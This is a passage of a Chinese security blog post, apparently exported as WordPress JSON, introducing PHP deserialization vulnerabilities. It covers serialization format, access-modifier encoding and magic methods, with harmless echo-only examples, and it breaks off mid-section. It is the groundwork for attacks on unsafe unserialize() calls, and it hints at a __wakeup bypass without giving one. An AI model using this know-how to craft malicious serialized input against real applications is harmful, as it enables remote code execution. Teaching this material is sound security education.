{"id":133,"date":"2025-06-09T21:21:17","date_gmt":"2025-06-09T13:21:17","guid":{"rendered":"http:\/\/101.201.119.158\/?p=133"},"modified":"2025-11-18T22:55:56","modified_gmt":"2025-11-18T14:55:56","slug":"php%e5%8f%8d%e5%ba%8f%e5%88%97%e5%8c%96%e6%bc%8f%e6%b4%9e","status":"publish","type":"post","link":"http:\/\/101.201.119.158\/?p=133","title":{"rendered":"PHP\u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e"},"content":{"rendered":"\n<h2 class=\"wp-block-heading\">\u6f0f\u6d1e\u5229\u7528\uff1a<\/h2>\n\n\n\n<p>\u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e\uff08Deserialization Vulnerability\uff09\u662f\u4e00\u79cd\u5b89\u5168\u6f0f\u6d1e\uff0c\u5b58\u5728\u4e8e\u5e94\u7528\u7a0b\u5e8f\u4e2d\u5bf9\u6570\u636e\u8fdb\u884c\u53cd\u5e8f\u5217\u5316\u64cd\u4f5c\u7684\u8fc7\u7a0b\u4e2d\u3002\u5f53\u5e94\u7528\u7a0b\u5e8f\u63a5\u6536\u5230\u5916\u90e8\u4f20\u9012\u7684\u6076\u610f\u5e8f\u5217\u5316\u6570\u636e\u5e76\u8fdb\u884c\u53cd\u5e8f\u5217\u5316\u65f6\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u8fd9\u4e2a\u6f0f\u6d1e\u6267\u884c\u672a\u7ecf\u6388\u6743\u7684\u4ee3\u7801\u6216\u5bfc\u81f4\u5e94\u7528\u7a0b\u5e8f\u53d7\u5230\u653b\u51fb\u3002<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u539f\u7406\uff1a<\/h2>\n\n\n\n<p>\u65e2\u7136\u662f\u53cd\u5e8f\u5217\u5316\u7684\u8bdd\uff0c\u9996\u5148\u8981\u4e86\u89e3\u4ec0\u4e48\u662f\u5e8f\u5217\u5316\u548c\u53cd\u5e8f\u5217\u5316\u4ee5\u53ca\u4ed6\u4eec\u7684\u533a\u522b<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">\u5e8f\u5217\u5316\uff1a\u5c31\u662f\u5c06\u5bf9\u8c61\u8f6c\u5316\u4e3a\u5b57\u7b26\u4e32\u8fdb\u884c\u5b58\u50a8 class S{` &nbsp;  `public $test=\"pikachu\";``}`` &nbsp; ``$s=new S(); &nbsp; &nbsp; \/\/\u521b\u5efa\u4e00\u4e2a\u5bf9\u8c61`` &nbsp; ``serialize($s); &nbsp; &nbsp; \/\/\u628a\u8fd9\u4e2a\u5bf9\u8c61\u8fdb\u884c\u5e8f\u5217\u5316`` &nbsp; ``\u5e8f\u5217\u5316\u540e\u5f97\u5230\u7684\u7ed3\u679c\u662f\u8fd9\u4e2a\u6837\u5b50\u7684:O:1:\"S\":1:{s:4:\"test\";s:7:\"pikachu\";}` &nbsp;  `O:\u4ee3\u8868object` &nbsp;  `1:\u8868\u793a\u8be5\u5bf9\u8c61\u7684\u7c7b\u540d\u7684\u5b57\u8282\u6570\uff08\u5373\u7c7b\u540d\u957f\u5ea6\u4e3a1\uff09` &nbsp;  `S:\u5bf9\u8c61\u7684\u540d\u79f0` &nbsp;  `1:\u8868\u793a\u8be5\u5bf9\u8c61\u6709 1 \u4e2a\u5c5e\u6027\u3002` &nbsp;  `s:\u6570\u636e\u7c7b\u578b` &nbsp;  `4:\u53d8\u91cf\u540d\u79f0\u7684\u957f\u5ea6` &nbsp;  `test:\u53d8\u91cf\u540d\u79f0` &nbsp;  `s:\u6570\u636e\u7c7b\u578b` &nbsp;  `7:\u53d8\u91cf\u503c\u7684\u957f\u5ea6` &nbsp;  `pikachu:\u53d8\u91cf\u503c<br>\u53cd\u5e8f\u5217\u5316\uff1a\u5c31\u662f\u5c06\u5b57\u7b26\u4e32\u8f6c\u5316\u4e3a\u5bf9\u8c61 $u=unserialize(\"O:1:\"S\":1:{s:4:\"test\";s:7:\"pikachu\";}\");`` &nbsp; ``echo $u-&gt;test; \/\/\u5f97\u5230\u7684\u7ed3\u679c\u4e3apikachu (\u6ce8\u610f\u662fecho)\u53cd\u5e8f\u5217\u5316\u4f7f\u7528 unserialize () \u51fd\u6570\u5c06\u5b57\u7b26\u4e32\u8f6c\u6362\u4e3a\u5bf9\u8c61\uff0c\u5e8f\u5217\u5316\u4f7f\u7528 serialize () \u51fd\u6570\u5c06\u5bf9\u8c61\u8f6c\u5316\u4e3a\u5b57\u7b26\u4e32\uff1b \u53cd\u5e8f\u5217\u5316\u4e0d\u89e6\u53d1\u7c7b\u7684\u6210\u5458\u65b9\u6cd5\uff0c\u9700\u8981\u8c03\u7528\u65b9\u6cd5\u540e\u624d\u80fd\u89e6\u53d1<br>\u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e\uff1a\u5c31\u662f\u5728\u53cd\u5e8f\u5217\u5316\u8fc7\u7a0b\u4e2d\uff0c\u5982\u679c\u6076\u610f\u8005\u53ef\u4ee5\u5bf9\u5c06\u8981\u8f6c\u6362\u7684\u5b57\u7b26\u4e32\u8fdb\u884c\u64cd\u63a7\uff0c\u4ece\u800c\u8fbe\u5230\u4efb\u610f\u4ee3\u7801\u6267\u884c\u7684\u64cd\u4f5c<\/pre>\n\n\n\n<p>\u800c\u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e\u7684\u4e3b\u8981\u539f\u7406\u662f\u5e94\u7528\u7a0b\u5e8f\u5728\u53cd\u5e8f\u5217\u5316\u8fc7\u7a0b\u4e2d\u6ca1\u6709\u5bf9\u4f20\u5165\u7684\u6570\u636e\u8fdb\u884c\u8db3\u591f\u7684\u9a8c\u8bc1\u548c\u8fc7\u6ee4\uff0c\u5bfc\u81f4\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u6784\u9020\u7684\u6076\u610f\u5e8f\u5217\u5316\u6570\u636e\u6765\u6267\u884c\u4efb\u610f\u4ee3\u7801\u6216\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u653b\u51fb\u3002<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">PHP\u9762\u5411\u5bf9\u8c61\u7684\u57fa\u7840\uff1a<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">1.\u8fc7\u7a0b\uff1a<\/h3>\n\n\n\n<p>\u9762\u5411\u8fc7\u7a0b\u662f\u4e00\u79cd\u4ee5\u201c\u6574\u4f53\u4e8b\u4ef6\u201d\u4e3a\u4e2d\u5fc3\u7684\u7f16\u7a0b\u601d\u60f3\uff0c\u7f16\u7a0b\u7684\u65f6\u5019\u628a\u89e3\u51b3\u95ee\u9898\u7684\u6b65\u9aa4\u5206\u6790\u51fa\u6765\uff0c\u7136\u540e\u7528\u51fd\u6570\u628a\u8fd9\u4e9b\u6b65\u9aa4\u5b9e\u73b0\uff0c\u5728\u4e00\u6b65\u4e00\u6b65\u7684\u5177\u4f53\u6b65\u9aa4\u4e2d\u518d\u6309\u987a\u5e8f\u8c03\u7528\u51fd\u6570\uff1b<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">2.\u5bf9\u8c61\uff1a<\/h3>\n\n\n\n<p>\u9762\u5411\u5bf9\u8c61\u662f\u4e00\u79cd\u4ee5\u201c\u5bf9\u8c61\u201d\u4e3a\u4e2d\u5fc3\u7684\u7f16\u7a0b\u601d\u60f3\uff0c\u628a\u8981\u89e3\u51b3\u7684\u95ee\u9898\u5206\u89e3\u6210\u5404\u4e2a\u201c\u5bf9\u8c61\u201d\uff1b\u5bf9\u8c61\u662f\u4e00\u4e2a\u7531\u4fe1\u606f\u53ca\u5bf9\u4fe1\u606f\u8fdb\u884c\u5904\u7406\u7684\u63cf\u8ff0\u6240\u7ec4\u6210\u7684\u6574\u4f53\uff0c\u662f\u5bf9\u73b0\u5b9e\u4e16\u754c\u7684\u62bd\u8c61\uff1b<\/p>\n\n\n\n<p>\u5bf9\u8c61\u7684\u4e09\u4e2a\u7279\u5f81\uff1a\u5bf9\u8c61\u7684\u884c\u4e3a\uff0c\u5bf9\u8c61\u7684\u5f62\u6001\uff0c\u5bf9\u8c61\u7684\u8868\u793a<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">3.\u7c7b\u7684\u5b9a\u4e49\uff1a<\/h3>\n\n\n\n<p>\u7c7b\u662f\u5b9a\u4e49\u4e86\u4e00\u4ef6\u4e8b\u7269\u7684\u62bd\u8c61\u7279\u70b9\uff0c\u5b83\u5c06\u6570\u636e\u7684\u5f62\u5f0f\u4ee5\u53ca\u8fd9\u4e9b\u6570\u636e\u4e0a\u7684\u64cd\u4f5c\u5c01\u88c5\u5728\u4e00\u8d77\uff1b\u5bf9\u8c61\u662f\u5177\u6709\u7c7b\u7c7b\u578b\u7684\u53d8\u91cf\uff0c\u662f\u5bf9\u7c7b\u7684\u5b9e\u4f8b\uff1b<\/p>\n\n\n\n<p>\u7c7b\u7684\u5b9a\u4e49\u5305\u62ec\u5b9a\u4e49\u7c7b\u540d\u3001\u5b9a\u4e49\u6210\u5458\u5c5e\u6027\u3001\u5b9a\u4e49\u6210\u5458\u65b9\u6cd5\uff1b \u5185\u90e8\u6784\u6210\uff1a\u6210\u5458\u5c5e\u6027(\u53d8\u91cf)+\u6210\u5458\u65b9\u6cd5(\u51fd\u6570)<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">4.\u7ee7\u627f\uff1a<\/h3>\n\n\n\n<p>\u7ee7\u627f\u6027\u662f\u5b50\u7c7b\u81ea\u52a8\u5171\u4eab\u7236\u7c7b\u6570\u636e\u7ed3\u6784\u548c\u65b9\u6cd5\u7684\u673a\u5236\uff0c\u662f\u7c7b\u4e4b\u95f4\u7684\u4e00\u79cd\u5173\u7cfb\uff1b<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\"> &nbsp;  \u5728\u5b9a\u4e49\u548c\u5b9e\u73b0\u4e00\u4e2a\u7c7b\u7684\u65f6\u5019\uff0c\u53ef\u4ee5\u5728\u4e00\u4e2a\u5df2\u7ecf\u5b58\u5728\u7684\u7c7b\u7684\u57fa\u7840\u4e4b\u4e0a\u6765\u8fdb\u884c\uff0c\u628a\u4e00\u4e2a\u5df2\u7ecf\u5b58\u5728\u7684\u7c7b\u6240\u5b9a\u4e49\u7684\u5185\u5bb9\u4f5c\u4e3a\u81ea\u5df1\u7684\u5185\u5bb9\uff0c\u5e76\u52a0\u5165\u82e5\u5e72\u65b0\u7684\u5185\u5bb9\uff1b<\/pre>\n\n\n\n<p>\u7236\u7c7b\uff1a\u4e00\u4e2a\u7c7b\u88ab\u5176\u5b83\u7c7b\u7ee7\u627f\uff0c\u53ef\u5c06\u8be5\u7c7b\u6210\u4e3a\u7236\u7c7b\uff0c\u6216\u57fa\u7c7b\uff0c\u8d85\u7c7b\uff1b<\/p>\n\n\n\n<p>\u5b50\u7c7b\uff1a\u4e00\u4e2a\u7c7b\u7ee7\u627f\u5176\u4ed6\u7c7b\u79f0\u4e3a\u5b50\u7c7b\uff0c\u4e5f\u53ef\u79f0\u4e3a\u6d3e\u751f\u7c7b\uff1b<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">5.\u6743\u9650\u4fee\u9970\u7b26\uff1a<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">public\uff1a\u516c\u5171\u7684\uff0c\u5728\u7c7b\u7684\u5185\u90e8\u3001\u5b50\u7c7b\u548c\u7c7b\u7684\u5916\u90e8\u4e2d\u90fd\u53ef\u4ee5\u88ab\u8c03\u7528\uff1b<br>protected\uff1a\u53d7\u4fdd\u62a4\u7684\uff0c\u5728\u7c7b\u7684\u5185\u90e8\u548c\u5b50\u7c7b\u53ef\u4ee5\u88ab\u8c03\u7528\uff0c\u5728\u7c7b\u7684\u5916\u90e8\u4e0d\u53ef\u8c03\u7528\uff1b<br>private\uff1a\u79c1\u6709\u7684\uff0c\u53ea\u80fd\u5728\u7c7b\u7684\u5185\u90e8\u8c03\u7528\uff0c\u5728\u5b50\u7c7b\u548c\u7c7b\u7684\u5916\u90e8\u4e0d\u53ef\u8c03\u7528\uff1b<br>\u4e3e\u4e2a\u6817\u5b50\uff1aclass MyClass {<br> &nbsp;  \/\/\u6210\u5458\u5c5e\u6027<br> &nbsp;  \/\/\u65b9\u6cd5<br>}<br>&lt;?php<br> &nbsp;  class wea5e1{<br> &nbsp;  public $we='111';<br> &nbsp;  protected $a5='222';<br> &nbsp;  private $e1='333';<br>}<br>$a=new wea5e1();<br>$a -&gt; we = '444';<br>echo serialize($a);<br>O:6:\"wea5e1\":3:{s:2:\"we\";s:3:\"444\";s:5:\"%00*%00a5\";s:3:\"222\";s:10:\"%00wea5e1%00e1\";s:3:\"333\";}<br>\u53ef\u4ee5\u53d1\u73b0\u8fd9\u4e2a\u6743\u9650protected\u4f1a\u5728\u4ed6\u7684\u6210\u5458\u90a3\u91cc\u52a0\u4e0a\u53bb%00*%00\uff0c\u800cprivate\u5219\u4f1a\u52a0%00\u7c7b\u7684\u540d\u5b57%00<br>\u4e00\u822c\u683c\u5f0f\uff1a<br>\u53d8\u91cf\u7c7b\u578b\uff1a\u7c7b\u540d\u957f\u5ea6\uff1a\u7c7b\u540d\uff1a\u5c5e\u6027\u6570\u91cf:{\u5c5e\u6027\u7c7b\u578b\uff1a\u5c5e\u6027\u540d\u957f\u5ea6\uff1a\u5c5e\u6027\u540d\uff1b\u5c5e\u6027\u503c\u7c7b\u578b\uff1a\u5c5e\u6027\u503c\u957f\u5ea6\uff1a\u5c5e\u6027\u503c\u5185\u5bb9}<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">6.\u7c7b\u578b\u63cf\u8ff0<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">a &nbsp; array \u6570\u7ec4\u578b<br>b &nbsp; boolean \u5e03\u5c14\u578b<br>d &nbsp; double \u6d6e\u70b9\u578b<br>i &nbsp; integer \u6574\u6570\u578b<br>o &nbsp; common object \u5171\u540c\u5bf9\u8c61<br>r &nbsp; object reference \u5bf9\u8c61\u5f15\u7528<br>s &nbsp; non-escaped binary string \u975e\u8f6c\u4e49\u7684\u4e8c\u8fdb\u5236\u5b57\u7b26\u4e32<br>S &nbsp; escaped binary string \u8f6c\u4e49\u7684\u4e8c\u8fdb\u5236\u5b57\u7b26\u4e32<br>C &nbsp; custom object \u81ea\u5b9a\u4e49\u5bf9\u8c61<br>O &nbsp; class \u5bf9\u8c61<br>N &nbsp; null \u7a7a<br>R &nbsp; pointer reference \u6307\u9488\u5f15\u7528<br>U &nbsp; unicode string Unicode \u7f16\u7801\u7684\u5b57\u7b26\u4e32<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">\u9b54\u672f\u65b9\u6cd5\uff1a<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">__construct() \u6784\u9020\u51fd\u6570\uff0c\u5f53\u4e00\u4e2a\u5bf9\u8c61\u521b\u5efa\u65f6\u88ab\u8c03\u7528\u3002\uff08\u5b9e\u4f8b\u5316\u65f6\uff09 <br>__destruct() \u6790\u6784\u51fd\u6570\uff0c\u5f53\u4e00\u4e2a\u5bf9\u8c61\u9500\u6bc1\u65f6\u88ab\u8c03\u7528\u3002\u4f1a\u5728\u5230\u67d0\u4e2a\u5bf9\u8c61\u7684\u6240\u6709\u5f15\u7528\u90fd\u88ab\u5220\u9664\u6216\u8005\u5f53\u5bf9\u8c61\u88ab\u663e\u5f0f\u9500\u6bc1\u65f6\u6267\u884c &nbsp;<br>__toString \u5f53\u4e00\u4e2a\u5bf9\u8c61\u88ab\u5f53\u4f5c\u4e00\u4e2a\u5b57\u7b26\u4e32\u88ab\u8c03\u7528\uff0c\u628a\u7c7b\u5f53\u4f5c\u5b57\u7b26\u4e32\u4f7f\u7528\u65f6\u89e6\u53d1\uff0c\u8fd4\u56de\u503c\u9700\u8981\u4e3a\u5b57\u7b26\u4e32 &nbsp;<br>__wakeup() \u8c03\u7528unserialize()\u65f6\u89e6\u53d1\uff0c\u53cd\u5e8f\u5217\u5316\u6062\u590d\u5bf9\u8c61\u4e4b\u524d\u8c03\u7528\u8be5\u65b9\u6cd5\uff0c\u4f8b\u5982\u91cd\u65b0\u5efa\u7acb\u6570\u636e\u5e93\u8fde\u63a5\uff0c\u6216\u6267\u884c\u5176\u5b83\u521d\u59cb\u5316\u64cd\u4f5c\u3002unserialize()\u4f1a\u68c0\u67e5\u662f\u5426\u5b58\u5728\u4e00\u4e2a__wakeup()\u65b9\u6cd5\u3002\u5982\u679c\u5b58\u5728\uff0c\u5219\u4f1a\u5148\u8c03\u7528__wakeup()\uff0c\u9884\u5148\u51c6\u5907\u5bf9\u8c61\u9700\u8981\u7684\u8d44\u6e90\u3002 &nbsp;<br>__sleep() \u8c03\u7528serialize()\u65f6\u89e6\u53d1 \uff0c\u5728\u5bf9\u8c61\u88ab\u5e8f\u5217\u5316\u524d\u81ea\u52a8\u8c03\u7528\uff0c\u5e38\u7528\u4e8e\u63d0\u4ea4\u672a\u63d0\u4ea4\u7684\u6570\u636e\uff0c\u6216\u7c7b\u4f3c\u7684\u6e05\u7406\u64cd\u4f5c\u3002\u540c\u65f6\uff0c\u5982\u679c\u6709\u4e00\u4e9b\u5f88\u5927\u7684\u5bf9\u8c61\uff0c\u4f46\u4e0d\u9700\u8981\u5168\u90e8\u4fdd\u5b58\uff0c\u8fd9\u4e2a\u529f\u80fd\u5c31\u5f88\u597d\u7528\u3002serialize()\u51fd\u6570\u4f1a\u68c0\u67e5\u7c7b\u4e2d\u662f\u5426\u5b58\u5728\u4e00\u4e2a\u9b54\u672f\u65b9\u6cd5__sleep()\u3002\u5982\u679c\u5b58\u5728\uff0c\u8be5\u65b9\u6cd5\u4f1a\u5148\u88ab\u8c03\u7528\uff0c\u7136\u540e\u624d\u6267\u884c\u5e8f\u5217\u5316\u64cd\u4f5c\u3002\u6b64\u529f\u80fd\u53ef\u4ee5\u7528\u4e8e\u6e05\u7406\u5bf9\u8c61\uff0c\u5e76\u8fd4\u56de\u4e00\u4e2a\u5305\u542b\u5bf9\u8c61\u4e2d\u6240\u6709\u5e94\u88ab\u5e8f\u5217\u5316\u7684\u53d8\u91cf\u540d\u79f0\u7684\u6570\u7ec4\u3002\u5982\u679c\u8be5\u65b9\u6cd5\u672a\u8fd4\u56de\u4efb\u4f55\u5185\u5bb9\uff0c\u5219 NULL \u88ab\u5e8f\u5217\u5316\uff0c\u5e76\u4ea7\u751f\u4e00\u4e2aE_NOTICE\u7ea7\u522b\u7684\u9519\u8bef &nbsp;<br>__call() \u5728\u5bf9\u8c61\u4e0a\u4e0b\u6587\u4e2d\u8c03\u7528\u4e0d\u53ef\u8bbf\u95ee\u7684\u65b9\u6cd5\u65f6\u89e6\u53d1\uff0c\u5373\u5f53\u8c03\u7528\u5bf9\u8c61\u4e2d\u4e0d\u5b58\u5728\u7684\u65b9\u6cd5\u4f1a\u81ea\u52a8\u8c03\u7528\u8be5\u65b9\u6cd5 &nbsp;<br>__callStatic() \u5728\u9759\u6001\u4e0a\u4e0b\u6587\u4e2d\u8c03\u7528\u4e0d\u53ef\u8bbf\u95ee\u7684\u65b9\u6cd5\u65f6\u89e6\u53d1 &nbsp;<br>__get() \u7528\u4e8e\u4ece\u4e0d\u53ef\u8bbf\u95ee\u7684\u5c5e\u6027\u8bfb\u53d6\u6570\u636e\uff0c\u5373\u5728\u8c03\u7528\u79c1\u6709\u5c5e\u6027\u7684\u65f6\u5019\u4f1a\u81ea\u52a8\u6267\u884c &nbsp;<br>__set() \u7528\u4e8e\u5c06\u6570\u636e\u5199\u5165\u4e0d\u53ef\u8bbf\u95ee\u7684\u5c5e\u6027 &nbsp;<br>__isset() \u5728\u4e0d\u53ef\u8bbf\u95ee\u7684\u5c5e\u6027\u4e0a\u8c03\u7528isset()\u6216empty()\u89e6\u53d1 &nbsp;<br>__unset() \u5728\u4e0d\u53ef\u8bbf\u95ee\u7684\u5c5e\u6027\u4e0a\u4f7f\u7528unset()\u65f6\u89e6\u53d1 &nbsp;<br>__invoke() \u5f53\u811a\u672c\u5c1d\u8bd5\u5c06\u5bf9\u8c61\u8c03\u7528\u4e3a\u51fd\u6570\u65f6\u89e6\u53d1<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\">construct():<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">\u6784\u9020\u51fd\u6570\uff0c\u5f53\u4e00\u4e2a\u5bf9\u8c61\u521b\u5efa\u65f6\u88ab\u8c03\u7528\u3002\uff08\u5b9e\u4f8b\u5316\u65f6\uff09\u4e3e\u4e2a\u6817\u5b50\uff1a<br>&lt;?php<br>class wea5e1{<br> &nbsp;  public function __construct()<br> &nbsp;  {<br> &nbsp; &nbsp; &nbsp;  echo 'construct\u65b9\u6cd5\u89e6\u53d1';<br> &nbsp;  }<br>}<br>$a = new wea5e1();<br>\/\/construct \u65b9\u6cd5\u89e6\u53d1<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\">destruct():<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">\u6790\u6784\u51fd\u6570\uff0c\u5f53\u4e00\u4e2a\u5bf9\u8c61\u9500\u6bc1\u65f6\u88ab\u8c03\u7528\u3002\u4f1a\u5728\u5230\u67d0\u4e2a\u5bf9\u8c61\u7684\u6240\u6709\u5f15\u7528\u90fd\u88ab\u5220\u9664\u6216\u8005\u5f53\u5bf9\u8c61\u88ab\u663e\u5f0f\u9500\u6bc1\u65f6\u6267\u884c \u4e3e\u4e2a\u6817\u5b50\uff1a<br>&lt;?php<br>class wea5e1{<br> &nbsp;  public function __destruct()<br> &nbsp;  {<br> &nbsp; &nbsp; &nbsp;  echo 'destruct\u65b9\u6cd5\u89e6\u53d1';<br> &nbsp;  }<br>}<br>$a = new wea5e1(); \/\/destruct\u65b9\u6cd5\u89e6\u53d1<\/pre>\n\n\n\n<p>\u867d\u7136\u8fd9\u4e24\u4e2a\u7684\u65b9\u5f0f\u5dee\u4e0d\u591a\u4f46\u662f\u4e8c\u8005\u4f18\u5148\u7ea7\u4e0d\u4e00\u6837<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">\u4e3e\u4e2a\u6817\u5b50\uff1a<br>&lt;?php<br>class wea5e1{<br> &nbsp;  public function __construct(){<br> &nbsp; &nbsp; &nbsp;  echo 'construct\u65b9\u6cd5\u89e6\u53d1';<br> &nbsp;  }<br> &nbsp;  public function __destruct()<br> &nbsp;  {<br> &nbsp; &nbsp; &nbsp;  echo 'destruct\u65b9\u6cd5\u89e6\u53d1';<br> &nbsp;  }<br>}<br>$a = new wea5e1(); \/\/construct\u65b9\u6cd5\u89e6\u53d1destruct\u65b9\u6cd5\u89e6\u53d1<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\">tostring():<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">\u5f53\u4e00\u4e2a\u5bf9\u8c61\u88ab\u5f53\u4f5c\u4e00\u4e2a\u5b57\u7b26\u4e32\u88ab\u8c03\u7528\uff0c\u628a\u7c7b\u5f53\u4f5c\u5b57\u7b26\u4e32\u4f7f\u7528\u65f6\u89e6\u53d1\uff0c\u8fd4\u56de\u503c\u9700\u8981\u4e3a\u5b57\u7b26\u4e32 \u4e3e\u4e2a\u6817\u5b50\uff1a<br>&lt;?php<br>class me{<br> &nbsp;  public $name=\"wea5e1\";<br> &nbsp;  public function __toString()<br> &nbsp;  {<br> &nbsp; &nbsp; &nbsp;  return '__toString\u65b9\u6cd5\u5df2\u89e6\u53d1';<br> &nbsp;  }<br>}<br>$a  = new me();<br>\/\/echo $a;<br>echo \"\\n\";<br>echo serialize($a);\/\/O:2:\"me\":1:{s:4:\"name\";s:6:\"wea5e1\";}<br>\u53d6\u6d88echo $a\u7684\u6ce8\u91ca\u7684\u8bdd \/\/__toString\u65b9\u6cd5\u5df2\u89e6\u53d1<br>O:2:\"me\":1:{s:4:\"name\";s:6:\"wea5e1\";}<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\">wakeup():<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">\u8c03\u7528unserialize()\u65f6\u89e6\u53d1\uff0c\u53cd\u5e8f\u5217\u5316\u6062\u590d\u5bf9\u8c61\u4e4b\u524d\u8c03\u7528\u8be5\u65b9\u6cd5\uff0c\u4f8b\u5982\u91cd\u65b0\u5efa\u7acb\u6570\u636e\u5e93\u8fde\u63a5\uff0c\u6216\u6267\u884c\u5176\u5b83\u521d\u59cb\u5316\u64cd\u4f5c\u3002unserialize()\u4f1a\u68c0\u67e5\u662f\u5426\u5b58\u5728\u4e00\u4e2a__wakeup()\u65b9\u6cd5\u3002\u5982\u679c\u5b58\u5728\uff0c\u5219\u4f1a\u5148\u8c03\u7528__wakeup()\uff0c\u9884\u5148\u51c6\u5907\u5bf9\u8c61\u9700\u8981\u7684\u8d44\u6e90\u3002(\u8fd9\u91cc\u6709\u4e2a\u7ed5\u8fc7)\u4e3e\u4e2a\u6817\u5b50\uff1a<br>&lt;?php<br>class me{<br> &nbsp;  public $name=\"wea5e1\";<br> &nbsp;  public function __wakeup()<br> &nbsp;  {<br> &nbsp; &nbsp; &nbsp;  echo '__wakeup\u65b9\u6cd5\u5df2\u89e6\u53d1';<br> &nbsp;  }<br>}<br>$a = new me();<br>$b = serialize($a);<br>echo $b;<br>$b = unserialize($b); \/\/O:2:\"me\":1:{s:4:\"name\";s:6:\"wea5e1\";}__wakeup\u65b9\u6cd5\u5df2\u89e6\u53d1<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\">sleep():<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">\u8c03\u7528serialize()\u65f6\u89e6\u53d1 \uff0c\u5728\u5bf9\u8c61\u88ab\u5e8f\u5217\u5316\u524d\u81ea\u52a8\u8c03\u7528\uff0c\u5e38\u7528\u4e8e\u63d0\u4ea4\u672a\u63d0\u4ea4\u7684\u6570\u636e\uff0c\u6216\u7c7b\u4f3c\u7684\u6e05\u7406\u64cd\u4f5c\u3002\u4e3e\u4e2a\u6817\u5b50\uff1a<br>&lt;?php<br>class me {<br>public $name = \"wea5e1\";<br>public $age = 18;<br>\u200b<br>public function __sleep() {<br>echo '__sleep\u65b9\u6cd5\u5df2\u89e6\u53d1' . PHP_EOL;<br>return ['age'];  \/\/ \u6307\u5b9a\u8981\u5e8f\u5217\u5316\u7684\u5c5e\u6027<br>}<br>}<br>\u200b<br>$a = new me();<br>$b = serialize($a);<br>echo $b;  \/\/__sleep\u65b9\u6cd5\u5df2\u89e6\u53d1<br>O:2:\"me\":1:{s:3:\"age\";i:18;}<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\">call():<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">\u8c03\u7528\u4e0d\u53ef\u8bbf\u95ee\u6216\u4e0d\u5b58\u5728\u7684\u65b9\u6cd5\u65f6\u89e6\u53d1 \u4e3e\u4e2a\u6817\u5b50\uff1a<br>&lt;?php<br>class wea5e1{<br> &nbsp;  public $name=\"wea5e1\";<br> &nbsp;  public $age = \"18\";<br> &nbsp;  public function __call($name, $age){<br> &nbsp; &nbsp; &nbsp;  echo 'call\u89e6\u53d1';<br> &nbsp; &nbsp; &nbsp;  echo \"\\n\";<br> &nbsp;  }<br>}<br>$a = new wea5e1();<br>$a -&gt; sb();<br>echo serialize($a); \/\/call\u89e6\u53d1<br>O:6:\"wea5e1\":2:{s:4:\"name\";s:6:\"wea5e1\";s:3:\"age\";s:2:\"18\";}<\/pre>\n\n\n\n<p>\u8fd9\u91cc\u5148\u8bb2\u4e0bget\u548cset(\u8fd9\u4e09\u4e2a\u53ef\u80fd\u7ecf\u5e38\u641e\u6df7)<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">get():<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">\u8c03\u7528\u4e0d\u53ef\u8bbf\u95ee\u6216\u4e0d\u5b58\u5728\u7684\u5c5e\u6027\u662f\u89e6\u53d1 \u548c\u4e0a\u9762\u8981\u533a\u5206\u5f00\u6765 \u4e3e\u4e2a\u6817\u5b50\uff1a<br>&lt;?php<br>class wea5e1{<br> &nbsp;  public $name=\"wea5e1\";<br> &nbsp;  public $age = \"18\";<br> &nbsp;  public function __get($name){<br> &nbsp; &nbsp; &nbsp;  echo 'get\u89e6\u53d1';<br> &nbsp; &nbsp; &nbsp;  echo \"\\n\";<br> &nbsp;  }<br>}<br>$a = new wea5e1();<br>$a -&gt; sb;<br>echo serialize($a);\/\/get\u89e6\u53d1<br>O:6:\"wea5e1\":2:{s:4:\"name\";s:6:\"wea5e1\";s:3:\"age\";s:2:\"18\";}<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\">set():<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">\u7528\u4e8e\u5c06\u6570\u636e\u5199\u5165\u4e0d\u53ef\u8bbf\u95ee\u7684\u5c5e\u6027 \u4e3e\u4e2a\u6817\u5b50\uff1a<br>&lt;?php<br>class wea5e1{<br> &nbsp;  public $name=\"wea5e1\";<br> &nbsp;  public $age = \"18\";<br> &nbsp;  public function __set($name,$age){<br> &nbsp; &nbsp; &nbsp;  echo 'set\u89e6\u53d1';<br> &nbsp; &nbsp; &nbsp;  echo \"\\n\";<br> &nbsp;  }<br>}<br>$a = new wea5e1();<br>$a -&gt; sb = \"nb\";<br>echo serialize($a); \/\/set\u89e6\u53d1<br>O:6:\"wea5e1\":2:{s:4:\"name\";s:6:\"wea5e1\";s:3:\"age\";s:2:\"18\";}<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\">isset():<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">\u5f53\u4f7f\u7528 isset \u6216\u8005\u662f empty 